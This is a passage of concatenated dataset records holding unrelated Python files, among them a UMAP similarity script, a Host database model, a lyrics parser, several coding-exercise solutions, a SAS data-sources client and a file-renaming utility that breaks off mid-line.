for access_pid, row in tqdm.tqdm(url_df.iterrows(), total=count):\n id = row['id']\n predictions_file = \"%s/%s.json.gz\" % (predictions_folder, id)\n if (not os.path.exists(predictions_file)):\n # no predictions for this file\n features, skipped = skip_row(id, features, skipped)\n else:\n try:\n # TODO: this seems to be printing info even though it's in try/except\n predictions = np.loadtxt(predictions_file)\n if (len(predictions) == PREDICTION_LENGTH):\n features.append(predictions)\n else:\n # wrong file length\n features, skipped = skip_row(id, features, skipped)\n except OSError:\n # the zip was corrupt\n features, skipped = skip_row(id, features, skipped)\n if (len(skipped) > 0):\n print(\"Skipped %s files:\" % len(skipped))\n print(skipped)\n return features\n\npca_exists = os.path.exists(pca_filename)\numap_exists = os.path.exists(umap_filename)\noutput_exists = os.path.exists(output_filename)\n\ndef do_pca(features):\n features = np.array(features)\n pca_features, pca = similarity.transform_features(features)\n if (not pca_exists or overwrite):\n pickle.dump([url_df, pca_features, pca], open(pca_filename, 'wb'))\n return pca_features, pca\n\ndef do_umap(pca_features):\n umap_features, tx, ty = similarity.umap_ify(pca_features)\n if (not umap_exists or overwrite):\n pickle.dump([umap_features, tx, ty], open(umap_filename, 'wb'))\n return umap_features, tx, ty\n\ndef do_similarity(features):\n # we don't ask if it exists because then what's the point of running this file?\n count = len(features)\n grid, nx, ny = similarity.rasterize_umap(features, count)\n # put the width/height info in the first row of the grid\n grid = np.insert(grid, 0, [nx, ny], axis=0)\n np.savetxt(output_filename, grid, fmt='%u')\n\nif (overwrite or (not pca_exists and not umap_exists)):\n features = load_predictions()\n pca_features, pca = do_pca(features)\n umap_features, tx, ty = do_umap(pca_features)\nelse:\n # first do pca\n if (pca_exists):\n print(\"loaded pca %s\" % pca_filename)\n url_df, pca_features, pca = pickle.load(open(pca_filename, 'rb'))\n else:\n features = load_predictions()\n pca_features, pca = do_pca(features)\n # now umap\n if (umap_exists):\n print(\"loaded umap %s\" % umap_filename)\n umap_features, tx, ty = 
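# Editor's note: a compact version of the cache-or-compute pattern this
# script applies to its PCA/UMAP pickles: reuse the file unless it is missing
# or --overwrite was given. `cached`, `compute`, and `path` are placeholder
# names for illustration, not part of the script above.
import os
import pickle

def cached(path, compute, overwrite=False):
    if os.path.exists(path) and not overwrite:
        with open(path, 'rb') as f:
            return pickle.load(f)
    result = compute()
    with open(path, 'wb') as f:
        pickle.dump(result, f)
    return result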
pickle.load(open(umap_filename, 'rb'))\n else:\n umap_features, tx, ty = do_umap(pca_features)\n # now rasterize\n do_similarity(umap_features)\n\nprint(\"Processed %s files in {} seconds\".format(time.time() - starttime) % count)\n","sub_path":"similar_csv.py","file_name":"similar_csv.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"324098627","text":"from db import db\nfrom models.mixins.CoreMixin import CoreMixin\nfrom utils.api_error import FormError\nfrom utils.request_utils import Serializer\nfrom utils.validation_utils import type_name, type_email, type_phone, type_city_or_state, max_length, required_length, \\\n type_zip_code, one_of, type_bool, min_length\nfrom utils.validation_utils import validate\n\nHNT = 'hnt'\nBANK_ACCOUNT = 'bank_account'\nVENMO = 'venmo'\n\n\nclass Host(db.Model, CoreMixin, Serializer):\n first_name = db.Column(db.String(80), nullable=False)\n last_name = db.Column(db.String(120), nullable=False)\n email = db.Column(db.String(120), unique=True, nullable=False)\n phone = db.Column(db.String(120), nullable=False)\n street = db.Column(db.String(120), nullable=False)\n city = db.Column(db.String(120), nullable=False)\n state = db.Column(db.String(120), nullable=False)\n zip = db.Column(db.String(120), nullable=False)\n w9_received = db.Column(db.Boolean, server_default='false', nullable=False)\n payment_method = db.Column(db.String(120), server_default=HNT, nullable=False)\n hnt_wallet = db.Column(db.String(120))\n bank_account_number = db.Column(db.String(120))\n bank_routing_number = db.Column(db.String(120))\n venmo_handle = db.Column(db.String(120))\n\n host_assignments = db.relationship(\"Assignment\", backref=\"host\", foreign_keys='Assignment.host_id')\n referral_assignments = db.relationship(\"Assignment\", backref=\"referer\", foreign_keys='Assignment.referer_id')\n host_invoices = db.relationship('HostInvoice', backref='host')\n\n validation = {\n 'first_name': [type_name],\n 'last_name': [type_name],\n 'email': [type_email],\n 'phone': [type_phone],\n 'street': [max_length(120)],\n 'city': [type_city_or_state],\n 'state': [type_city_or_state],\n 'zip': [type_zip_code],\n 'w9_received': [type_bool],\n 'payment_method': [one_of([HNT, BANK_ACCOUNT, VENMO])],\n 'hnt_wallet': [min_length(50), max_length(52)],\n 'bank_account_number': [min_length(6), max_length(24)],\n 'bank_routing_number': [min_length(6), max_length(24)],\n 'venmo_handle': [],\n }\n\n def serialize(self):\n return {'first_name': self.first_name,\n 'last_name': self.last_name,\n 'email': self.email,\n 'phone': self.phone,\n 'street': self.street,\n 'city': self.city,\n 'state': self.state,\n 'zip': self.zip,\n 'hnt_wallet': self.hnt_wallet,\n 'w9_received': self.w9_received,\n 'payment_method': self.payment_method,\n 'bank_account_number': self.bank_account_number,\n 'bank_routing_number': self.bank_routing_number,\n 'venmo_handle': self.venmo_handle,\n 'id': self.id\n }\n\n def eligible_to_be_referred(self, assignment_being_edited_id):\n # if the host has never had an assignment\n if self.host_assignments is None or not len(self.host_assignments): return True\n\n # if the host being referred has only one active assignment and it is the one being edited\n if len(self.host_assignments) == 1 and \\\n self.host_assignments[0].is_active() and \\\n str(self.host_assignments[0].id) == str(assignment_being_edited_id):\n return True\n\n return False\n\n @staticmethod\n def make_new(data):\n if 
Host.email_in_use(data): raise FormError('host with the provided email already exists')\n\n validate(data, Host.validation)\n\n # noinspection PyArgumentList\n h = Host(email=data['email'],\n first_name=data['first_name'],\n last_name=data['last_name'],\n phone=data['phone'],\n street=data['street'],\n city=data['city'],\n state=data['state'],\n zip=data['zip'],\n payment_method=data['payment_method'])\n\n return Host.host_payment_details(h, data)\n\n @staticmethod\n def update(data):\n validate(data, Host.validation)\n h = Host.query.get(data['id'])\n\n h.email = data['email']\n h.first_name = data['first_name']\n h.last_name = data['last_name']\n h.phone = data['phone']\n h.street = data['street']\n h.city = data['city']\n h.state = data['state']\n h.zip = data['zip']\n h.w9_received = data['w9_received']\n h.payment_method = data['payment_method'] # changes apply to entire month\n\n Host.host_payment_details(h, data)\n db.session.commit()\n\n @staticmethod\n def by_id(host_id):\n return Host.query.get(host_id)\n\n @staticmethod\n def email_in_use(data):\n return Host.query.filter_by(email=data['email']).first()\n\n # TODO: shouldn't be static\n @staticmethod\n def host_payment_details(_host, data):\n method = data['payment_method']\n\n if method == HNT:\n _host.hnt_wallet = data['hnt_wallet']\n if method == BANK_ACCOUNT:\n _host.bank_account_number = data['bank_account_number']\n _host.bank_routing_number = data['bank_routing_number']\n if method == VENMO:\n _host.venmo_handle = data['venmo_handle']\n return _host\n","sub_path":"models/Host.py","file_name":"Host.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"612577382","text":"import re\n\nfrom domains import Domain\n\nurl = 'https://genius.com'\n\n\nclass Genius(Domain):\n\n def __init__(self):\n super().__init__(url)\n\n def _parse(self, body: str):\n hrefRegex = re.compile('^(<a href.*?</a>)', re.S | re.M)\n\n for href in re.findall(hrefRegex, body):\n body = body.replace(href, '')\n\n return body.replace('<p>', '').replace('</p>', '')\n\n def parse(self, html):\n bodyRegex = re.compile('<div class=\"lyrics\">(.+?)</div>', flags=re.S | re.M)\n\n try:\n body = next(re.finditer(bodyRegex, html)).group(1)\n except StopIteration:\n return None\n\n data = self._parse(body)\n return data\n","sub_path":"domains/genius.py","file_name":"genius.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"526426496","text":"\"\"\"\r\n831. Mask Personal Information\r\n\r\nYou are given a personal information string S, which may be either an email address or a phone number.\r\n\r\nWe will mask its private information according to the following rules:\r\n\r\n1. Email address\r\nA name is defined to have length greater than 2 and to contain only lowercase letters a-z and uppercase letters A-Z.\r\nAn email address starts with a name, followed by the symbol '@', then another name, then a dot '.',\r\nand finally one more name. The email address is guaranteed to be valid and to have the format \"name1@name2.name3\".\r\nTo mask an email, all names must be converted to lowercase,\r\nand all letters between the first and last letter of the first name must be replaced by 5 asterisks '*'.\r\n\r\n2. Phone number\r\nA phone number is a string containing the digits 0-9 and the characters {'+', '-', '(', ')', ' '}.\r\nYou may assume the phone number contains 10 to 13 digits.\r\nThe last 10 digits form the local number, and the digits before them form the country code. Note that the country code is optional.\r\nWe only expose the last 4 digits and mask all the other digits.\r\nThe local number is formatted and displayed as \"***-***-1111\", where the 1's represent the exposed digits.\r\nTo mask a phone number with a country code, such as \"+111 111 111 1111\", we display it as \"+***-***-***-1111\".\r\nThe '+' sign and the first '-' before the local number exist only when the phone number contains a country code.\r\nFor example, a 12-digit phone number should start with \"+**-\".\r\nNote: extraneous characters such as \"(\", \")\", \" \", as well as extra dashes or plus signs that do not fit the format above, should be removed.\r\n\r\n\r\nFinally, return the information with the privacy correctly masked.\r\n\r\nExample 1:\r\nInput: \"LeetCode@LeetCode.com\"\r\nOutput: \"l*****e@leetcode.com\"\r\nExplanation:\r\nAll names are converted to lowercase, and the letters between the first and last letter of the first name are replaced by 5 asterisks.\r\nTherefore, \"leetcode\" -> \"l*****e\".\r\n\r\nExample 2:\r\nInput: \"AB@qq.com\"\r\nOutput: \"a*****b@qq.com\"\r\nExplanation:\r\nThere must be 5 asterisks between the first and last character of the first name \"ab\".\r\nTherefore, \"ab\" -> \"a*****b\".\r\n\r\nExample 3:\r\nInput: \"1(234)567-890\"\r\nOutput: \"***-***-7890\"\r\nExplanation:\r\nA 10-digit phone number, which means all of the digits belong to the local number.\r\n\r\nExample 4:\r\nInput: \"86-(10)12345678\"\r\nOutput: \"+**-***-***-5678\"\r\nExplanation:\r\n12 digits: 2 of them form the country code and the other 10 form the local number.\r\n\r\nNotes:\r\nS.length <= 40.\r\nAn email has length at least 8.\r\nA phone number has length at least 10.\r\n\"\"\"\r\n\r\n\r\nclass Solution:\r\n def maskPII(self, S):\r\n \"\"\"\r\n :type S: str\r\n :rtype: str\r\n \"\"\"\r\n\r\n if ('@' in S):\r\n email = S.lower().partition('@')\r\n return email[0][0] + '*****' + email[0][-1] + '@' + email[-1]\r\n else:\r\n phone = [n for n in S if n.isdigit()]\r\n p_l = len(phone)\r\n phone_tail = ''.join(phone[-4:])\r\n if (p_l == 10):\r\n return '***-***-' + phone_tail\r\n else:\r\n return '+' + '*' * (p_l - 10) + '-***-***-' + phone_tail\r\n\r\n\r\ns = Solution()\r\nprint(s.maskPII('LeetCode@LeetCode.com'))\r\nprint(s.maskPII('AB@qq.com'))\r\nprint(s.maskPII('1(234)567-890'))\r\nprint(s.maskPII('86-(10)12345678'))\r\n\r\n\"\"\"\r\nApproach:\r\n* If S contains '@', it is an email: lowercase it, split it on '@', then join the first and last characters of the first name with ***** in between.\r\n* Otherwise it is a phone number: filter out all of the digits.\r\n* If there are 10 digits, it is a purely local number.\r\n* If there are more than 10, it is an international number.\r\n\"\"\"\r\n","sub_path":"LeetCode/831.py","file_name":"831.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"20792953","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/10/23 11:52 AM\n# @Author : Muximus\n# @Site : \n# @File : sentence_embedding_core.py\n# @Software: PyCharm\nimport os\nimport sys\nimport logging\nimport numpy as np\n\n_root = os.path.normpath(\"%s/..\" % os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(_root)\nlogger = logging.getLogger(__name__)\nfrom utils.dataset import Dataset\nfrom utils.data_helper import find_files, parallel_get_activation_by_model, parallel_data_listener\nfrom functools import partial\n\n\nclass BaseSentenceEmb(object):\n \"\"\"base Sentence Embedding class\n \"\"\"\n\n def __init__(self, model_wrapper: BaseModelWrapper, data_wrapper: RawDataWrapper):\n self.model_wrapper = model_wrapper\n self.data_wrapper = 
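# Editor's note: a quick check of the phone-masking arithmetic in maskPII
# above: with p_l digits in total, the country code contributes p_l - 10
# stars after the leading '+', and only the last four digits survive.
digits = [c for c in '86-(10)12345678' if c.isdigit()]
p_l = len(digits)                       # 12 digits in total
masked = '+' + '*' * (p_l - 10) + '-***-***-' + ''.join(digits[-4:])
assert masked == '+**-***-***-5678'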
data_wrapper\n\n def predict(self, divide_nums, ndtype=None):\n datas = self.data_wrapper.batch_generator(divide_nums)\n dest_data_files = []\n for i, batch_data in enumerate(datas):\n sentence_emb = self.model_wrapper.predict(batch_data)\n if ndtype is not None:\n sentence_emb = sentence_emb.astype(ndtype)\n dest_data_files.append(sentence_emb)\n logger.info('predict data slice_{} shape:{}'.format(i, sentence_emb.shape))\n logger.info('===PREDICT DONE! len:{}====='.format(len(dest_data_files)))\n return np.concatenate(dest_data_files)\n\n def predict_save(self, dest_dir, prefix, divide_nums):\n datas = self.data_wrapper.batch_generator(divide_nums)\n dest_data_files = []\n for i, batch_data in enumerate(datas):\n sentence_emb = self.model_wrapper.predict(batch_data)\n dest_data_file = '{}/{}_{}'.format(dest_dir, prefix, i)\n np.save(dest_data_file, sentence_emb)\n dest_data_files.append(dest_data_file + '.npy')\n logger.info('export data slice_{} length:{} to: {}'.format(i, len(sentence_emb), dest_dir))\n logger.info('====SAVE DONE!=====')\n return dest_data_files\n\n\ndef emb_and_save(data_dir, file_pattern, saved_data_name, model_dir, feature, word_index, msl, cleanable, layer_index, seps, headers, data_axises, drop_values, drop_axises,\n usecols_all):\n files = find_files(data_dir, file_pattern)\n Dataset.from_files(files, feature, word_index=word_index, msl=msl, find_new_word=False, cleanable=cleanable, qid_index=None, seps=seps,\n headers=headers, data_axises=data_axises, qid_axises=None, label_str_axises=None, drop_values=drop_values, drop_axises=drop_axises,\n usecols_all=usecols_all).reduce(10).map().custom_reduce_map(4, partial(parallel_get_activation_by_model, model_dir=model_dir, layer_index=layer_index),\n partial(parallel_data_listener, kill_sign='kill'))\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"sentence_embedding/sentence_embedding_main.py","file_name":"sentence_embedding_main.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"139554814","text":"# Summation of primes\n\n# The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n# Find the sum of all the primes below two million.\n\ndef is_prime(number):\n if number > 1:\n for i in range(2, number):\n if (number % i) == 0:\n return False\n else:\n return True\n else:\n return False\n\nsum = 2\n\nfor number in range(3, 2000000):\n if number % 2 == 0: continue\n if is_prime(number): sum += number\n\nprint(sum)\n# Time: \n","sub_path":"python/problem10.py","file_name":"problem10.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"501343653","text":"from __future__ import generators\nimport py\n\ndef test_newcode(): \n source = \"i = 3\"\n co = compile(source, '', 'exec') \n code = py.code.Code(co) \n newco = code.new() \n assert co == newco \n\ndef test_ne():\n code1 = py.code.Code(compile('foo = \"bar\"', '', 'exec'))\n assert code1 == code1\n code2 = py.code.Code(compile('foo = \"baz\"', '', 'exec'))\n assert code2 != code1\n\ndef test_newcode_unknown_args(): \n code = py.code.Code(compile(\"\", '', 'exec'))\n py.test.raises(TypeError, 'code.new(filename=\"hello\")')\n\ndef test_newcode_withfilename():\n source = py.code.Source(\"\"\"\n def f():\n def g():\n pass\n \"\"\")\n co = compile(str(source)+'\\n', 'nada', 'exec')\n obj = 'hello'\n newco = py.code.Code(co).new(rec=True, co_filename=obj)\n def walkcode(co):\n for x 
in co.co_consts:\n if isinstance(x, type(co)):\n for y in walkcode(x):\n yield y\n yield co\n\n names = []\n for code in walkcode(newco):\n assert newco.co_filename == obj\n assert newco.co_filename is obj\n names.append(code.co_name)\n assert 'f' in names\n assert 'g' in names\n\ndef test_newcode_with_filename(): \n source = \"i = 3\"\n co = compile(source, '', 'exec') \n code = py.code.Code(co) \n class MyStr(str): \n pass \n filename = MyStr(\"hello\") \n filename.__source__ = py.code.Source(source) \n newco = code.new(rec=True, co_filename=filename) \n assert newco.co_filename is filename \n s = py.code.Source(newco) \n assert str(s) == source \n\n","sub_path":"code/testing/test_code.py","file_name":"test_code.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212035335","text":"import os\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n\ndef main():\n names = list(os.listdir('datasets/tianchi_xray/restricted/'))\n img1 = Image.open(os.path.join('datasets/tianchi_xray/restricted', names[random.randint(0, len(names) - 1)]))\n img2 = Image.open(os.path.join('datasets/tianchi_xray/restricted', names[random.randint(0, len(names) - 1)]))\n\n plt.subplot(2, 2, 1)\n plt.imshow(img1)\n plt.subplot(2, 2, 2)\n plt.imshow(img2)\n\n lambd = 0.5\n\n img1 = np.array(img1, dtype='float32')\n img2 = np.array(img2, dtype='float32')\n height = max(img1.shape[0], img2.shape[0])\n width = max(img1.shape[1], img2.shape[1])\n\n mixed_img = np.zeros(shape=(height, width, 3), dtype='float32')\n mixed_img[:img1.shape[0], :img1.shape[1], :] = img1 * lambd\n mixed_img[:img2.shape[0], :img2.shape[1], :] += img2 * (1. - lambd)\n mixed_img = mixed_img.astype('uint8')\n mixed_img = Image.fromarray(mixed_img)\n\n plt.subplot(2, 2, 3)\n plt.imshow(mixed_img)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/tianchi_xray/mixup_test.py","file_name":"mixup_test.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"292841188","text":"'''\n760. Find Anagram Mappings\n\nGiven two lists Aand B, and B is an anagram of A. B is an anagram of A means B is made by randomizing the order of the elements in A.\n\nWe want to find an index mapping P, from A to B. A mapping P[i] = j means the ith element in A appears in B at index j.\n\nThese lists A and B may contain duplicates. If there are multiple answers, output any of them.\n\nFor example, given\n\nA = [12, 28, 46, 32, 50]\nB = [50, 12, 32, 46, 28]\nWe should return\n[1, 4, 3, 2, 0]\nas P[0] = 1 because the 0th element of A appears at B[1], and P[1] = 4 because the 1st element of A appears at B[4], and so on.\nNote:\n\nA, B have equal lengths in range [1, 100].\nA[i], B[i] are integers in range [0, 10^5].\n'''\n\n\ndef anagramMappings(A, B):\n lst = []\n\n for i in range(0, len(A)):\n key = A[i]\n if key in B:\n lst.append(B.index(key))\n return lst\n\ndef main():\n A = [12, 28, 46, 32, 50]\n B = [50, 12, 32, 46, 28]\n print(anagramMappings(A, B))\n\nif __name__=='__main__':\n main()","sub_path":"python/CodingExercises/LeetCode760.py","file_name":"LeetCode760.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"189905152","text":"#!/usr/bin/env python\n# encoding: utf-8\n#\n# Copyright © 2019, SAS Institute Inc., Cary, NC, USA. 
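# Editor's note: on the randint fix in mixup_test above — random.randint is
# inclusive on both ends, so randint(0, len(names)) can index one past the
# end of the list. random.choice sidesteps the bounds arithmetic entirely:
import random

names = ['a.jpg', 'b.jpg', 'c.jpg']
picked = random.choice(names)   # equivalent selection, no off-by-one risk
assert picked in names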
All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"Enables retrieval of data source metadata.\n\nThe Data Sources API works in concert with the Data Tables and Row Sets APIs\nto navigate, reference, and retrieve data in the SAS Viya ecosystem. The\nData Sources API enables retrieval of metadata for data sources and linking\nto their respective tables.\n\n\"\"\"\n\nfrom ..core import current_session, get, get_link, request_link, \\\n _build_crud_funcs\n\n_SERVICE_ROOT = '/dataSources'\n\n\ndef is_available():\n \"\"\"Checks if the service is currently available.\n\n Returns\n -------\n bool\n\n \"\"\"\n response = current_session().head(_SERVICE_ROOT + '/')\n return response.status_code == 200\n\n\ndef info():\n \"\"\"Version and build information for the service.\n\n Returns\n -------\n RestObj\n\n \"\"\"\n return get(_SERVICE_ROOT + '/apiMeta')\n\n\nlist_providers, \\\n_, _, _ = _build_crud_funcs(_SERVICE_ROOT + '/providers', 'provider')\n\n\ndef get_provider(provider, refresh=False):\n \"\"\"Returns a provider instance.\n\n Parameters\n ----------\n provider : str or dict\n Name, ID, or dictionary representation of the provider.\n refresh : bool, optional\n Obtain an updated copy of the provider.\n\n Returns\n -------\n RestObj or None\n A dictionary containing the provider attributes or None.\n\n Notes\n -------\n If `provider` is a complete representation of the provider it will be\n returned unless `refresh` is set. This prevents unnecessary REST calls\n when data is already available on the client.\n\n \"\"\"\n if isinstance(provider, dict) and 'id' in provider:\n if refresh:\n provider = provider['id']\n else:\n return provider\n\n return get(_SERVICE_ROOT + '/providers/{id}'.format(id=provider))\n\n\ndef list_sources(provider):\n \"\"\"List all data sources available for a provider.\n\n Parameters\n ----------\n provider : str or dict\n Name, ID, or dictionary representation of the provider.\n\n Returns\n -------\n list\n A collection of :class:`.RestObj` instances.\n\n \"\"\"\n\n provider = get_provider(provider)\n\n sources = request_link(provider, 'dataSources')\n if isinstance(sources, list):\n return sources\n else:\n return [sources]\n\n\ndef get_source(provider, source):\n \"\"\"Returns a data source belonging to a given provider.\n\n Parameters\n ----------\n provider : str or dict\n Name, ID, or dictionary representation of the provider.\n source : str\n Name or id of the data source\n\n Returns\n -------\n RestObj or None\n A dictionary containing the data source attributes or None.\n\n \"\"\"\n if isinstance(source, dict) and 'providerId' in source:\n return source\n\n sources = list_sources(provider)\n\n for s in sources:\n if source in (s.name, s.id):\n return s\n\n\ndef list_caslibs(source='cas-shared-default', filter=None):\n \"\"\"Get all caslibs registered with the given CAS server.\n\n Parameters\n ----------\n source : str, optional\n Name of the CAS server. Defaults to `cas-shared-default`.\n filter : str, optional\n\n Returns\n -------\n list\n A collection of :class:`.RestObj` instances.\n\n Notes\n -----\n See the filtering_ reference for details on the `filter` parameter.\n\n .. 
_filtering: https://developer.sas.com/reference/filtering/\n\n \"\"\"\n source = get_source('cas', source)\n\n params = 'filter={}'.format(filter) if filter is not None else {}\n result = request_link(source, 'children', params=params)\n\n return result if isinstance(result, list) else [result]\n\n\ndef get_caslib(name, source=None):\n \"\"\"Get a caslib by name.\n\n Parameters\n ----------\n name : str\n Name of the caslib\n source : str, optional\n Name of the CAS server. Defaults to `cas-shared-default`.\n\n Returns\n -------\n RestObj\n\n \"\"\"\n source = source or 'cas-shared-default'\n caslibs = list_caslibs(source, filter='eq(name, \"%s\")' % name)\n\n # caslibs = [c for c in caslibs if c.name == name]\n\n if len(caslibs):\n return caslibs.pop()\n\n\ndef list_tables(caslib, filter=None):\n \"\"\"List tables available in a caslib.\n\n Parameters\n ----------\n caslib : str or dict\n Name, ID, or dictionary representation of the caslib.\n filter : str, optional\n\n Returns\n -------\n list\n A collection of :class:`.RestObj` instances.\n\n Notes\n -----\n See the filtering_ reference for details on the `filter` parameter.\n\n .. _filtering: https://developer.sas.com/reference/filtering/\n\n \"\"\"\n if not get_link(caslib, 'tables'):\n caslib = get_caslib(caslib)\n\n params = 'filter={}'.format(filter) if filter is not None else {}\n result = request_link(caslib, 'tables', params=params)\n\n return result if isinstance(result, list) else [result]\n\n\n\ndef get_table(name, caslib, server=None):\n \"\"\"Get metadata for a CAS table.\n\n Parameters\n ----------\n name : str\n Name of the table\n caslib : str or dict\n Name, ID, or dictionary representation of the caslib.\n server : str\n Name of the CAS server on which the `caslib` is registered.\n\n Returns\n -------\n RestObj\n\n \"\"\"\n tables = list_tables(caslib, filter='eq(name, \"%s\")' % name)\n\n if len(tables):\n return tables.pop()\n\n\n\n\n","sub_path":"src/sasctl/services/data_sources.py","file_name":"data_sources.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"576117527","text":"import matplotlib.pyplot as plt\nfrom math_linreg2.snippets.data.loader import SawlikePop1M, chunks\n\n\npopulation = SawlikePop1M()\nsamples = chunks(population, 100)\nguys_with_no_13 = [sample[13] for sample in samples]\n\n\n\nplt.subplot(2, 1, 1)\nplt.hist(population, 50)\nplt.ylabel('observation as outcome')\n\nplt.subplot(2, 1, 2)\nplt.hist(guys_with_no_13, 50)\nplt.ylabel('sample as outcome')\n\nplt.show()","sub_path":"source/math_linreg2/snippets/sample_vs_observation.py","file_name":"sample_vs_observation.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"345027961","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2015 hm authors. 
All rights reserved.\n# Use of this source code is governed by a BSD-style\n# license that can be found in the LICENSE file.\nimport codecs\n\nfrom setuptools import setup, find_packages\n\nfrom rpaas import __version__\n\nREADME = codecs.open('README.rst', encoding='utf-8').read()\n\nsetup(\n name=\"tsuru-rpaas\",\n version=__version__,\n description=\"Reverse proxy as-a-service API for Tsuru PaaS\",\n long_description=README,\n author=\"Tsuru\",\n author_email=\"tsuru@corp.globo.com\",\n classifiers=[\n \"Programming Language :: Python :: 2.7\",\n ],\n packages=find_packages(exclude=[\"docs\", \"tests\"]),\n include_package_data=True,\n install_requires=[\n \"Flask==0.9\",\n \"requests==2.4.3\",\n \"gunicorn==0.17.2\",\n \"tsuru-hm==0.3.0\",\n \"celery[redis]\",\n \"flower==0.7.3\",\n \"GloboNetworkAPI==0.2.2\",\n ],\n extras_require={\n 'tests': [\n \"mock==1.0.1\",\n \"flake8==2.1.0\",\n \"coverage==3.7.1\",\n \"freezegun==0.2.8\",\n ]\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"296139580","text":"import os\nimport entities\nimport algorithms\n\nfrom concurrent import futures\n\nAVAILABLE_COACHES = {\n 'LARC2020Coach': entities.coach.LarcCoach,\n 'Iron2021Coach': entities.coach.IronCoach,\n 'Astar': entities.coach.AstarCoach\n}\n\nclass Match(object):\n def __init__(self, game, team_color, num_robots=3, coach_name=None, category=\"3v3\"):\n super().__init__()\n self.game = game\n self.n_robots = num_robots\n self.coach_name = coach_name\n self.team_color = os.environ.get('TEAM_COLOR', team_color)\n self.category = category\n\n self.opposite_team_color = 'yellow' if self.team_color == 'blue' else 'blue'\n\n \n def start(self):\n self.ball = entities.Ball(self.game)\n\n self.opposites = [\n entities.Robot(self.game, i, self.opposite_team_color) for i in range(self.n_robots)\n ]\n\n self.robots = [\n entities.Robot(self.game, i, self.team_color) for i in range(self.n_robots)\n ]\n\n self.coach = AVAILABLE_COACHES[self.coach_name](self)\n self.coach.decide()\n\n for robot in self.robots:\n robot.start()\n\n def update(self, frame):\n self.ball.update(frame)\n\n for entity in self.opposites:\n entity.update(frame)\n \n for entity in self.robots:\n entity.update(frame)\n\n \n def decide(self):\n commands = []\n '''\n https://docs.python.org/3/library/concurrent.futures.html\n '''\n\n self.coach.decide()\n\n with futures.ThreadPoolExecutor(max_workers=self.n_robots) as executor:\n commands = [\n executor.submit(robot.decide).result() for robot in self.robots\n ]\n \n return commands\n","sub_path":"match/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"452370452","text":"# -*- coding: utf-8 -*-\nimport os, sys, re, unicodedata\n\ndef RDelFiles(CurrentPath, DeleteFile):\n\tglobal DeleteFiles\n\tDeleteFiles = [line.strip() for line in open(CurrentPath + DeleteFile, 'r')]\n\ndef RChgWords(CurrentPath, WordsFile):\n\tglobal AllWords\n\t# print (\"\\nOuverture de : \" + CurrentPath + WordsFile)\n\tAllWords = [line.strip() for line in open(CurrentPath + WordsFile, 'r')]\n\t\ndef remove_accents(input_str):\n\tnfkd_form = unicodedata.normalize('NFKD', input_str)\n\talphanum = u\"\".join([c for c in nfkd_form if not unicodedata.combining(c)])\t# suppress accents\n\talphanum = re.sub('[^0-9a-zA-Z-]', '.', 
alphanum).lstrip('.')\t\t\t\t\t\t\t# suppress non alphanum\n\treturn re.sub('[.]+', '.', alphanum).rstrip('.')\t\t\t\t\t\t\t\t\t\t\t\t\t# reduce dot\n\ndef Change_Words(input_str):\n\tfor line in AllWords:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# lecture de la table des mots\n\t\tif \";\" in line:\n\t\t\tswords, rwords = line.split(\";\")\n\t\t\t# print (swords, rwords)\n\t\t\tif swords.lower() in input_str.lower():\n\t\t\t\t# print (swords, rwords)\n\t\t\t\tNewString = rwords.join( re.compile(swords, flags=re.I).split(input_str) )\t# replace case insensitive\n\t\t\t\tNewString = re.sub('[.]+', '.', NewString)\n\t\t\t\tinput_str = NewString.rstrip('.')\n\treturn input_str\n\ndef readPath(RootPath):\n\tprint(\"Lecture à partir de -->\" + RootPath)\n\tfor root, dirs, files in os.walk(RootPath, topdown=False):\n\t\tfor dirname in dirs:\n\t\t\t# print (dirname)\n\t\t\ttry:\n\t\t\t\tNewName = Change_Words(remove_accents(dirname))\n\t\t\t\tif dirname != NewName:\n\t\t\t\t\tNameSrc = os.path.join(root, dirname)\n\t\t\t\t\tNameDest = os.path.join(root, NewName)\n\t\t\t\t\tprint (\"old=\", NameSrc)\n\t\t\t\t\tprint (\"New=\", NameDest)\n\t\t\t\t\tos.rename(NameSrc, NameDest)\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\tfor filename in files:\n\t\t\tif filename.lower() in 